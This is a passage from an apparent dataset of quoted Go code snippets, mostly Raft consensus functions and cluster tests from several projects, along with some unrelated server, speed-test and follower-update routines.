StateFollower\n\tr.Term = term\n\tr.Lead = lead\n\tr.Vote = None\n\tr.electionElapsed = 0\n\tr.randomElectionTimeout = randomTimeout(r.electionTimeout)\n\t// Your Code Here (2A).\n}", "func (s *Server) StartTest(ctx context.Context, request *StartTest_Request) (response *StartTest_Response, err error) {\n\t// @TODO: maybe make this command sync, and stream interaction to let the\n\t// client know when all the interaction has been sent\n\n\tlogging.Log(fmt.Sprintf(\"StartTest - incoming request: %+v\", request))\n\tresponse = new(StartTest_Response)\n\n\tvar ct *config.Test\n\tvar ts *TestSession\n\n\ts.muTests.Lock()\n\n\t// checks if test exists\n\tif gtest, ok := s.Tests[request.GroupName]; ok {\n\t\tif ct, ok = gtest[request.TestN]; !ok {\n\t\t\ts.muTests.Unlock()\n\t\t\treturn response, logging.LogErr(errors.New(ErrTestNotExist))\n\t\t}\n\t}\n\n\t// checks if test isn't already running\n\tif gtest, ok := s.TestSessions[request.GroupName]; ok {\n\t\tif ts, ok = gtest[request.TestN]; ok {\n\t\t\ts.muTests.Unlock()\n\t\t\treturn response, logging.LogErr(errors.New(ErrTestNotExist))\n\t\t}\n\t}\n\n\tsctx := context.Background()\n\tts = NewTestSession(sctx, ct)\n\ts.TestSessions[request.GroupName][request.TestN] = ts\n\n\ts.muTests.Unlock()\n\n\ttime.Sleep(time.Second * 5)\n\n\tlogging.Log(fmt.Sprintf(\"starting test: %+v\", ct))\n\n\tgo func() {\n\t\tvar x int\n\t\tfor x = 0; ts.IsRunning() && x < ct.AmountInternal; x += 1 {\n\t\t\tswitch ct.TypeInternal {\n\t\t\tcase config.TestTypeText:\n\t\t\t\tmessage := ConstructTextMessage(ct.SizeInternal)\n\t\t\t\terr = s.SendTextMessage(sctx, request.GroupName, message)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlogging.Log(err.Error())\n\t\t\t\t}\n\n\t\t\tcase config.TestTypeMedia:\n\t\t\t\timage, err := ConstructImageMessage(ct.SizeInternal)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlogging.Log(err.Error())\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\n\t\t\t\terr = s.SendImageMessage(sctx, request.GroupName, image)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlogging.Log(err.Error())\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tlogging.Log(fmt.Sprintf(\"sent message to group: %s\", request.GroupName))\n\t\t\ttime.Sleep(time.Second * time.Duration(ct.IntervalInternal))\n\t\t}\n\n\t\tlogging.Log(fmt.Sprintf(\"sent %d messages to %s\\n\", x, request.GroupName))\n\t}()\n\n\treturn response, logging.LogErr(err)\n}", "func (rf *Raft) BeFollower(term int) {\n\t//////fmt.Print(\"%d become follower\\n\", rf.me)\n\trf.state = Follower\n\trf.currentTerm = term\n\trf.votedFor = NULL\n}", "func TestLeaderSyncFollowerLog(t *testing.T) {\n\tents := []pb.Entry{\n\t\t{},\n\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t}\n\tterm := uint64(8)\n\ttests := [][]pb.Entry{\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10}, {Term: 6, Index: 11},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t\t\t{Term: 7, Index: 11}, {Term: 7, Index: 12},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5}, {Term: 4, Index: 6}, {Term: 4, Index: 7},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 2, Index: 4}, {Term: 2, Index: 5}, {Term: 2, Index: 6},\n\t\t\t{Term: 3, Index: 7}, {Term: 3, Index: 8}, {Term: 3, Index: 9}, {Term: 3, Index: 10}, {Term: 3, Index: 11},\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tleadStorage := NewMemoryStorage()\n\t\tdefer leadStorage.Close()\n\t\tleadStorage.Append(ents)\n\t\tlead := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, leadStorage)\n\t\tlead.loadState(pb.HardState{Commit: lead.raftLog.lastIndex(), Term: term})\n\t\tfollowerStorage := NewMemoryStorage()\n\t\tdefer followerStorage.Close()\n\t\tfollowerStorage.Append(tt)\n\t\tfollower := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, followerStorage)\n\t\tfollower.loadState(pb.HardState{Term: term - 1})\n\t\t// It is necessary to have a three-node cluster.\n\t\t// The second may have more up-to-date log than the first one, so the\n\t\t// first node needs the vote from the third node to become the leader.\n\t\tn := newNetwork(lead, follower, nopStepper)\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\t// The election occurs in the term after the one we loaded with\n\t\t// lead.loadState above.\n\t\tn.send(pb.Message{From: 3, To: 1, Type: pb.MsgVoteResp, Term: term + 1})\n\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\t\tif g := diffu(ltoa(lead.raftLog), ltoa(follower.raftLog)); g != \"\" {\n\t\t\tt.Errorf(\"#%d: log diff:\\n%s\", i, g)\n\t\t}\n\t}\n}", "func TestCreateStreamNoMetadataLeader(t *testing.T) {\n\tdefer cleanupStorage(t)\n\n\t// Use a central NATS server.\n\tns := natsdTest.RunDefaultServer()\n\tdefer ns.Shutdown()\n\n\t// Configure first server.\n\ts1Config := getTestConfig(\"a\", true, 0)\n\ts1 := runServerWithConfig(t, s1Config)\n\tdefer s1.Stop()\n\n\t// Configure second server.\n\ts2Config := getTestConfig(\"b\", false, 5050)\n\ts2 := runServerWithConfig(t, s2Config)\n\tdefer s2.Stop()\n\n\t// Wait for a leader to be elected to allow the cluster to form, then stop\n\t// a server and wait for the leader to step down.\n\tgetMetadataLeader(t, 10*time.Second, s1, s2)\n\ts1.Stop()\n\twaitForNoMetadataLeader(t, 10*time.Second, s1, s2)\n\n\t// Connect and send the request to the follower.\n\tclient, err := lift.Connect([]string{\"localhost:5050\"})\n\trequire.NoError(t, err)\n\tdefer client.Close()\n\n\terr = client.CreateStream(context.Background(), \"foo\", \"foo\")\n\trequire.Error(t, err)\n\tst := status.Convert(err)\n\trequire.Equal(t, \"No known metadata leader\", st.Message())\n\trequire.Equal(t, codes.Internal, st.Code())\n}", "func TestRaftProposeNewCommand(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftProposeNewCommands\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\tconnectAllNodes(n1, n2)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Find out who leader is.\n\tvar leader *Raft\n\tvar follower *Raft\n\tselect {\n\tcase <-fsm1.leaderCh:\n\t\tleader = n1\n\t\tfollower = n2\n\tcase <-fsm2.leaderCh:\n\t\tleader = n2\n\t\tfollower = n1\n\t}\n\n\t// Proposing on follower node should fail.\n\tpending := follower.Propose([]byte(\"data\"))\n\t<-pending.Done\n\tif pending.Err != ErrNodeNotLeader {\n\t\tt.Fatalf(\"expected 'ErrNotNotLeader' error when propose on follower node.\")\n\t}\n\n\t// Propose 100 commands.\n\tfor i := 0; i < 100; i++ {\n\t\tleader.Propose([]byte(\"I'm data-\" + strconv.Itoa(i)))\n\t}\n\n\t// Two FSMs should have applied same sequence of commands.\n\tif !testEntriesEqual(fsm1.appliedCh, fsm2.appliedCh, 100) {\n\t\tt.Fatal(\"two FSMs in same group applied different sequence of commands.\")\n\t}\n}", "func TestRaftPending(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftPending\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\tconnectAllNodes(n1, n2)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Find out who leader is.\n\tvar leader *Raft\n\tvar follower *Raft\n\tselect {\n\tcase <-fsm1.leaderCh:\n\t\tleader = n1\n\t\tfollower = n2\n\tcase <-fsm2.leaderCh:\n\t\tleader = n2\n\t\tfollower = n1\n\t}\n\n\t// Prpose a command on leader.\n\tpending := leader.Propose([]byte(\"I'm data\"))\n\n\t// Block until the command concludes.\n\t<-pending.Done\n\n\t// \"Apply\" should return the exact command back.\n\tif pending.Err != nil {\n\t\tt.Fatal(\"expected no error returned in pending\")\n\t}\n\tif string(pending.Res.([]byte)) != \"I'm data\" {\n\t\tt.Fatal(\"expected exact command to be returned in pending.\")\n\t}\n\n\t// Propose to non-leader node should result an error.\n\tpending = follower.Propose([]byte(\"I'm data too\"))\n\n\t// Block until the command concludes.\n\t<-pending.Done\n\n\t// Should return an error \"ErrNodeNotLeader\" when propose command to non-leader node.\n\tif pending.Err != ErrNodeNotLeader {\n\t\tt.Fatalf(\"expected to get error %q when propose to non-leader node\", ErrNodeNotLeader)\n\t}\n}", "func (serv *AppServer) Follow(user int, following int) {\n\tserv.ServerRequest([]string{\"Follow\", strconv.Itoa(user), strconv.Itoa(following)})\n}", "func (m *messagingSuite) TestProbeBeforeBootstrap() {\n\tvar (\n\t\tserverAddr1 = m.addr\n\t\tserverAddr2 = newaddr(freeport.MustNext())\n\t\tnodeID1 = api.NewNodeId()\n\t\tnodeID2 = api.NewNodeId()\n\t\tsettings2 = transport.DefaultServerSettings(api.NewNode(serverAddr2, nil))\n\t\trpcServer = &transport.Server{\n\t\t\tConfig: &settings2,\n\t\t}\n\t\trequire = m.Require()\n\t\tview = NewView(m.k, nil, nil)\n\t)\n\trequire.NoError(rpcServer.Init())\n\trequire.NoError(rpcServer.Start())\n\trequire.NoError(view.RingAdd(m.ctx, serverAddr1, nodeID1))\n\trequire.NoError(view.RingAdd(m.ctx, serverAddr2, nodeID2))\n\tm.createAndStartMembershipService(\"server-0\", serverAddr1, view)\n\n\tjoinerClient := transport.NewGRPCClient(&settings2.Settings, grpc.WithInsecure())\n\n\tprobeResp1, err := joinerClient.Do(m.ctx, serverAddr1, probeRequest())\n\trequire.NoError(err)\n\trequire.Equal(remoting.NodeStatus_OK, probeResp1.GetProbeResponse().GetStatus())\n\n\tprobeResp2, err := joinerClient.Do(m.ctx, serverAddr2, probeRequest())\n\trequire.NoError(err)\n\trequire.Equal(remoting.NodeStatus_BOOTSTRAPPING, probeResp2.GetProbeResponse().GetStatus())\n}", "func (r *Raft) becomeFollower(term uint64, lead uint64) {\n\tr.State = StateFollower\n\tr.Term = term\n\tr.Lead = lead\n\tr.electionElapsed = 0\n\tr.actualElectionTimeout = r.generateElectionTimeout()\n}", "func StartUpdateFollowersLoop(\n\tctx context.Context,\n\tfollowTarget string,\n\tredisCl *redis.Client,\n\thelixCl *helix.Client,\n) {\n\tgo func() {\n\t\tUpdateFollowers(ctx, followTarget, redisCl, helixCl)\n\t\tt := time.NewTicker(5 * time.Minute)\n\t\tfor range t.C {\n\t\t\tUpdateFollowers(ctx, followTarget, redisCl, helixCl)\n\t\t}\n\t}()\n}", "func TestStartFresh(t *testing.T) {\n\tn := Node{me: 0, peers: make([]*Node, 1), chainLength: 0}\n\tClearBlockChain()\n\tn.InitWebApp(\"Cameron\", 8080)\n}", "func (suite *PouchStartSuite) TestStartInWrongWay(c *check.C) {\n\tfor _, tc := range []struct {\n\t\tname string\n\t\targs string\n\t}{\n\t\t{name: \"missing container name\", args: \"\"},\n\t\t{name: \"unknown flag\", args: \"-k\"},\n\t} {\n\t\tres := command.PouchRun(\"start\", tc.args)\n\t\tc.Assert(res.Error, check.NotNil, check.Commentf(tc.name))\n\t}\n}", "func TestSetLocalHeadSeqSuccess(t *testing.T) {\n\tctl := gomock.NewController(t)\n\tdefer ctl.Finish()\n\n\tnextSeq := int64(5)\n\tmockServiceClient := storagemock.NewMockWriteServiceClient(ctl)\n\tmockServiceClient.EXPECT().Next(gomock.Any(), gomock.Any()).Return(&storage.NextSeqResponse{\n\t\tSeq: nextSeq,\n\t}, nil)\n\n\tmockFct := rpc.NewMockClientStreamFactory(ctl)\n\tmockFct.EXPECT().CreateWriteServiceClient(node).Return(mockServiceClient, nil)\n\tmockFct.EXPECT().LogicNode().Return(node)\n\tmockFct.EXPECT().CreateWriteClient(gomock.Any(), gomock.Any(), gomock.Any()).Return(nil, errors.New(\"create stream client error\"))\n\n\tdone := make(chan struct{})\n\tmockFct.EXPECT().CreateWriteServiceClient(node).DoAndReturn(func(_ models.Node) (storage.WriteServiceClient, error) {\n\t\tclose(done)\n\t\t// wait for <- done to stop replica\n\t\ttime.Sleep(100 * time.Millisecond)\n\t\treturn nil, errors.New(\"get service client error any\")\n\t})\n\n\tmockFanOut := queue.NewMockFanOut(ctl)\n\tmockFanOut.EXPECT().SetHeadSeq(nextSeq).Return(nil)\n\n\trep := newReplicator(node, database, shardID, mockFanOut, mockFct)\n\n\t<-done\n\trep.Stop()\n}", "func (svrs Servers) StartTest() {\n\tfor i, s := range svrs {\n\t\ts.Show()\n\t\tlatency := pingTest(s.URL)\n\t\tdlSpeed := downloadTest(s.URL, latency)\n\t\tulSpeed := uploadTest(s.URL, latency)\n\t\tsvrs[i].DLSpeed = dlSpeed\n\t\tsvrs[i].ULSpeed = ulSpeed\n\t\tsvrs[i].Ping = latency\n\t}\n}", "func TestPairingLifecycle(t *testing.T) {\n\tt.Parallel()\n\n\t// Create a pairing initiator and ensure both profile and networking is required\n\talice, _ := newTestNode(\"\", \"--verbosity\", \"5\", \"--hostname\", \"alice\")\n\tdefer alice.close()\n\n\tif _, err := alice.InitPairing(); err == nil {\n\t\tt.Fatalf(\"pairing initialized without profile\")\n\t}\n\talice.CreateProfile()\n\talice.UpdateProfile(&rest.ProfileInfos{Name: \"Alice\"})\n\n\tif _, err := alice.InitPairing(); err == nil {\n\t\tt.Fatalf(\"pairing initialized without networking\")\n\t}\n\t// Enable networking too and ensure pairing can be started, once\n\talice.EnableGateway()\n\tsecret, err := alice.InitPairing()\n\tif err != nil {\n\t\tt.Fatalf(\"failed to initialize pairing: %v\", err)\n\t}\n\tif _, err := alice.InitPairing(); err == nil {\n\t\tt.Fatalf(\"duplicate pairing initialized\")\n\t}\n\t// Create a pairing joiner and ensure profile and network requirements\n\tbob, _ := newTestNode(\"\", \"--verbosity\", \"5\", \"--hostname\", \"bobby\")\n\tdefer bob.close()\n\n\tif _, err := bob.JoinPairing(secret); err == nil {\n\t\tt.Fatalf(\"pairing joined without profile\")\n\t}\n\tbob.CreateProfile()\n\tbob.UpdateProfile(&rest.ProfileInfos{Name: \"Bob\"})\n\n\tif _, err := bob.JoinPairing(secret); err == nil {\n\t\tt.Fatalf(\"pairing joined without networking\")\n\t}\n\t// Enable networking too and ensure pairing can be joined, once\n\tbob.EnableGateway()\n\tif _, err := bob.JoinPairing(secret); err != nil {\n\t\tt.Fatalf(\"failed to join pairing: %v\", err)\n\t}\n\tif _, err := bob.JoinPairing(secret); err == nil {\n\t\tt.Fatalf(\"managed to join finished pairing\")\n\t}\n\t// Wait for the pairing initiator to complete too\n\tif _, err := alice.WaitPairing(); err != nil {\n\t\tt.Fatalf(\"failed to wait for pairing: %v\", err)\n\t}\n\tif _, err := alice.WaitPairing(); err == nil {\n\t\tt.Fatalf(\"manged to wait on finished pairing\")\n\t}\n\t// Repairing with the same contacts should fail\n\tsecret, err = alice.InitPairing()\n\tif err != nil {\n\t\tt.Fatalf(\"failed to initialize pairing: %v\", err)\n\t}\n\tif _, err := bob.JoinPairing(secret); err == nil {\n\t\tt.Fatalf(\"managed to pair with already paired contact\")\n\t}\n\tif _, err := alice.WaitPairing(); err == nil {\n\t\tt.Fatalf(\"managed to pair with already paired contact\")\n\t}\n}", "func TestStart(t *testing.T) {\n\tTestingT(t)\n}", "func TestFollowerVote(t *testing.T) {\n\ttests := []struct {\n\t\tvote uint64\n\t\tnvote uint64\n\t\twreject bool\n\t}{\n\t\t{None, 1, false},\n\t\t{None, 2, false},\n\t\t{1, 1, false},\n\t\t{2, 2, false},\n\t\t{1, 2, true},\n\t\t{2, 1, true},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.loadState(pb.HardState{Term: 1, Vote: tt.vote})\n\n\t\tr.Step(pb.Message{From: tt.nvote, FromGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\tTo: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTerm: 1, Type: pb.MsgVote})\n\n\t\tmsgs := r.readMessages()\n\t\twmsgs := []pb.Message{\n\t\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\t\tTo: tt.nvote, ToGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\t\tTerm: 1, Type: pb.MsgVoteResp, Reject: tt.wreject},\n\t\t}\n\t\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\t\tt.Errorf(\"#%d: msgs = %v, want %v\", i, msgs, wmsgs)\n\t\t}\n\t}\n}", "func testStartServer(t *testing.T, etcdCfg *Config, startTimeout *time.Duration, servers []*Server) (*Server, []*Server, error) {\n\tvar err error\n\t// create a new server\n\tserver := New()\n\n\t// create a context for starting the server\n\tvar timeout context.Context\n\tvar cancel context.CancelFunc\n\tif startTimeout != nil {\n\t\ttimeout, cancel = context.WithTimeout(context.Background(), *startTimeout)\n\t} else {\n\t\ttimeout, cancel = context.WithTimeout(context.Background(), 120*time.Second)\n\t}\n\n\t// start the server\n\terr = server.Start(timeout, etcdCfg)\n\n\tcancel()\n\n\t// if the server started correctly\n\tif err == nil {\n\t\t// cover ErrAlreadyRunning\n\t\tif server.Start(timeout, etcdCfg) != ErrAlreadyRunning {\n\t\t\tt.Errorf(\"Already running server did not return ErrAlreadyRunning when start was invoked %v\", server)\n\t\t\tt.Fail()\n\t\t}\n\n\t\tif server.IsRunning() {\n\t\t\t// store server to servers for test clean up\n\t\t\tservers = append(servers, server)\n\t\t}\n\t}\n\n\treturn server, servers, err\n}", "func TestClusteringFollowerDeleteOldChannelPriorToSnapshotRestore(t *testing.T) {\n\tcleanupDatastore(t)\n\tdefer cleanupDatastore(t)\n\tcleanupRaftLog(t)\n\tdefer cleanupRaftLog(t)\n\n\trestoreMsgsAttempts = 2\n\trestoreMsgsRcvTimeout = 50 * time.Millisecond\n\trestoreMsgsSleepBetweenAttempts = 0\n\tdefer func() {\n\t\trestoreMsgsAttempts = defaultRestoreMsgsAttempts\n\t\trestoreMsgsRcvTimeout = defaultRestoreMsgsRcvTimeout\n\t\trestoreMsgsSleepBetweenAttempts = defaultRestoreMsgsSleepBetweenAttempts\n\t}()\n\n\t// For this test, use a central NATS server.\n\tns := natsdTest.RunDefaultServer()\n\tdefer ns.Shutdown()\n\n\tmaxInactivity := 250 * time.Millisecond\n\n\t// Configure first server\n\ts1sOpts := getTestDefaultOptsForClustering(\"a\", true)\n\ts1sOpts.Clustering.TrailingLogs = 0\n\ts1sOpts.MaxInactivity = maxInactivity\n\ts1 := runServerWithOpts(t, s1sOpts, nil)\n\tdefer s1.Shutdown()\n\n\t// Configure second server.\n\ts2sOpts := getTestDefaultOptsForClustering(\"b\", false)\n\ts2sOpts.Clustering.TrailingLogs = 0\n\ts2sOpts.MaxInactivity = maxInactivity\n\ts2 := runServerWithOpts(t, s2sOpts, nil)\n\tdefer s2.Shutdown()\n\n\t// Configure third server.\n\ts3sOpts := getTestDefaultOptsForClustering(\"c\", false)\n\ts3sOpts.Clustering.TrailingLogs = 0\n\ts3sOpts.MaxInactivity = maxInactivity\n\ts3 := runServerWithOpts(t, s3sOpts, nil)\n\tdefer s3.Shutdown()\n\n\tservers := []*StanServer{s1, s2, s3}\n\n\t// Wait for leader to be elected.\n\tleader := getLeader(t, 10*time.Second, servers...)\n\n\t// Create a client connection.\n\tsc, err := stan.Connect(clusterName, clientName)\n\tif err != nil {\n\t\tt.Fatalf(\"Expected to connect correctly, got err %v\", err)\n\t}\n\tdefer sc.Close()\n\n\t// Send a message, which will create the channel\n\tchannel := \"foo\"\n\texpectedMsg := make(map[uint64]msg)\n\texpectedMsg[1] = msg{sequence: 1, data: []byte(\"1\")}\n\texpectedMsg[2] = msg{sequence: 2, data: []byte(\"2\")}\n\texpectedMsg[3] = msg{sequence: 3, data: []byte(\"3\")}\n\tfor i := 1; i < 4; i++ {\n\t\tif err := sc.Publish(channel, expectedMsg[uint64(i)].data); err != nil {\n\t\t\tt.Fatalf(\"Error on publish: %v\", err)\n\t\t}\n\t}\n\t// Wait for channel to be replicated in all servers\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 3, expectedMsg, servers...)\n\n\t// Shutdown a follower\n\tvar follower *StanServer\n\tfor _, s := range servers {\n\t\tif leader != s {\n\t\t\tfollower = s\n\t\t\tbreak\n\t\t}\n\t}\n\tservers = removeServer(servers, follower)\n\tfollower.Shutdown()\n\n\t// Let the channel be deleted\n\ttime.Sleep(2 * maxInactivity)\n\n\t// Now send a message that causes the channel to be recreated\n\texpectedMsg = make(map[uint64]msg)\n\texpectedMsg[1] = msg{sequence: 1, data: []byte(\"4\")}\n\tif err := sc.Publish(channel, expectedMsg[1].data); err != nil {\n\t\tt.Fatalf(\"Error on publish: %v\", err)\n\t}\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 1, expectedMsg, servers...)\n\n\t// Perform snapshot on the leader.\n\tif err := leader.raft.Snapshot().Error(); err != nil {\n\t\tt.Fatalf(\"Error during snapshot: %v\", err)\n\t}\n\n\t// Now send another message then a sub to prevent deletion\n\texpectedMsg[2] = msg{sequence: 2, data: []byte(\"5\")}\n\tif err := sc.Publish(channel, expectedMsg[2].data); err != nil {\n\t\tt.Fatalf(\"Error on publish: %v\", err)\n\t}\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 2, expectedMsg, servers...)\n\tsc.Subscribe(channel, func(_ *stan.Msg) {}, stan.DeliverAllAvailable())\n\n\t// Now restart the follower...\n\tfollower = runServerWithOpts(t, follower.opts, nil)\n\tdefer follower.Shutdown()\n\tservers = append(servers, follower)\n\tgetLeader(t, 10*time.Second, servers...)\n\n\t// Now check content of channel on the follower.\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 2, expectedMsg, follower)\n}", "func setUp(t *testing.T, start ...bool) (*Conn, *testState) {\n\tctrl := gomock.NewController(t)\n\tst := state.NewMockTracker(ctrl)\n\tnc := MockNetConn(t)\n\tc := SimpleClient(\"test\", \"test\", \"Testing IRC\")\n\tc.initialise()\n\tctx := context.Background()\n\n\tc.st = st\n\tc.sock = nc\n\tc.cfg.Flood = true // Tests can take a while otherwise\n\tc.connected = true\n\t// If a second argument is passed to setUp, we tell postConnect not to\n\t// start the various goroutines that shuttle data around.\n\tc.postConnect(ctx, len(start) == 0)\n\t// Sleep 1ms to allow background routines to start.\n\t<-time.After(time.Millisecond)\n\n\treturn c, &testState{ctrl, st, nc, c}\n}", "func (rf *Raft) becomeFollower(term int, leader int) {\n\trf.reset(term)\n\trf.state = Follower\n\trf.leader = leader\n\tDebugPrint(\"%d become follower of %d in term: %d\\n\", rf.me, leader, term)\n}", "func (m *messagingSuite) TestJoinFirstNode() {\n\tm.createAndStartMembershipService(\"server\", m.addr, nil)\n\tclientAddr, client := m.makeClient(\"client\", freeport.MustNext())\n\tdefer client.Close()\n\n\tresp, err := m.sendPreJoinMessage(client, m.addr, clientAddr, api.NewNodeId())\n\tm.Require().NoError(err)\n\tm.Require().NotNil(resp)\n\tm.Require().Equal(remoting.JoinStatusCode_SAFE_TO_JOIN, resp.GetStatusCode())\n\tm.Require().Equal(m.k, len(resp.GetEndpoints()))\n}", "func TestTransferNonMember(t *testing.T) {\n\tr := newTestRaft(1, []uint64{2, 3, 4}, 5, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgTimeoutNow})\n\n\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgVoteResp})\n\tr.Step(pb.Message{From: 3, To: 1, Type: pb.MsgVoteResp})\n\tif r.state != StateFollower {\n\t\tt.Fatalf(\"state is %s, want StateFollower\", r.state)\n\t}\n}", "func (a *Agent) Start() error {\n\tgo func() {\n\t\tfor range a.peerUpdateChan {\n\t\t\tif err := a.members.UpdateNode(nodeUpdateTimeout); err != nil {\n\t\t\t\tlogrus.Errorf(\"error updating node metadata: %s\", err)\n\t\t\t}\n\t\t}\n\t}()\n\tif len(a.config.Peers) > 0 {\n\t\tdoneCh := make(chan bool)\n\t\tgo func() {\n\t\t\ttimeout := time.Now().Add(a.config.LeaderPromotionTimeout)\n\t\t\tfor {\n\t\t\t\tif time.Now().After(timeout) {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tif _, err := a.members.Join(a.config.Peers); err != nil {\n\t\t\t\t\tlogrus.WithError(err).Warn(\"unable to join\")\n\t\t\t\t\ttime.Sleep(1 * time.Second)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tdoneCh <- true\n\t\t}()\n\n\t\tselect {\n\t\tcase <-time.After(a.config.LeaderPromotionTimeout):\n\t\t\tlogrus.Infof(\"timeout (%s) trying to join peers; self-electing as leader\", a.config.LeaderPromotionTimeout)\n\t\tcase <-doneCh:\n\t\t\tlogrus.Infof(\"joined peers %s\", a.config.Peers)\n\t\t}\n\t}\n\treturn nil\n}", "func (handler *RuleHandler) FollowerOnStateMachineProbe(msg iface.MsgStateMachineProbe, log iface.RaftLog, status iface.Status) []interface{} {\n\t// leader should be responsible for this\n\treturn []interface{}{iface.ReplyNotLeader{}}\n}", "func TestClusteringFollowerDeleteChannelNotInSnapshot(t *testing.T) {\n\tcleanupDatastore(t)\n\tdefer cleanupDatastore(t)\n\tcleanupRaftLog(t)\n\tdefer cleanupRaftLog(t)\n\n\t// For this test, use a central NATS server.\n\tns := natsdTest.RunDefaultServer()\n\tdefer ns.Shutdown()\n\n\tmaxInactivity := 250 * time.Millisecond\n\n\t// Configure first server\n\ts1sOpts := getTestDefaultOptsForClustering(\"a\", true)\n\ts1sOpts.Clustering.TrailingLogs = 0\n\ts1sOpts.MaxInactivity = maxInactivity\n\ts1 := runServerWithOpts(t, s1sOpts, nil)\n\tdefer s1.Shutdown()\n\n\t// Configure second server.\n\ts2sOpts := getTestDefaultOptsForClustering(\"b\", false)\n\ts2sOpts.Clustering.TrailingLogs = 0\n\ts2sOpts.MaxInactivity = maxInactivity\n\ts2 := runServerWithOpts(t, s2sOpts, nil)\n\tdefer s2.Shutdown()\n\n\t// Configure third server.\n\ts3sOpts := getTestDefaultOptsForClustering(\"c\", false)\n\ts3sOpts.Clustering.TrailingLogs = 0\n\ts3sOpts.MaxInactivity = maxInactivity\n\ts3 := runServerWithOpts(t, s3sOpts, nil)\n\tdefer s3.Shutdown()\n\n\tservers := []*StanServer{s1, s2, s3}\n\tfor _, s := range servers {\n\t\tcheckState(t, s, Clustered)\n\t}\n\n\t// Wait for leader to be elected.\n\tleader := getLeader(t, 10*time.Second, servers...)\n\n\t// Create a client connection.\n\tsc, err := stan.Connect(clusterName, clientName)\n\tif err != nil {\n\t\tt.Fatalf(\"Expected to connect correctly, got err %v\", err)\n\t}\n\tdefer sc.Close()\n\n\t// Send a message, which will create the channel\n\tchannel := \"foo\"\n\texpectedMsg := make(map[uint64]msg)\n\texpectedMsg[1] = msg{sequence: 1, data: []byte(\"first\")}\n\tif err := 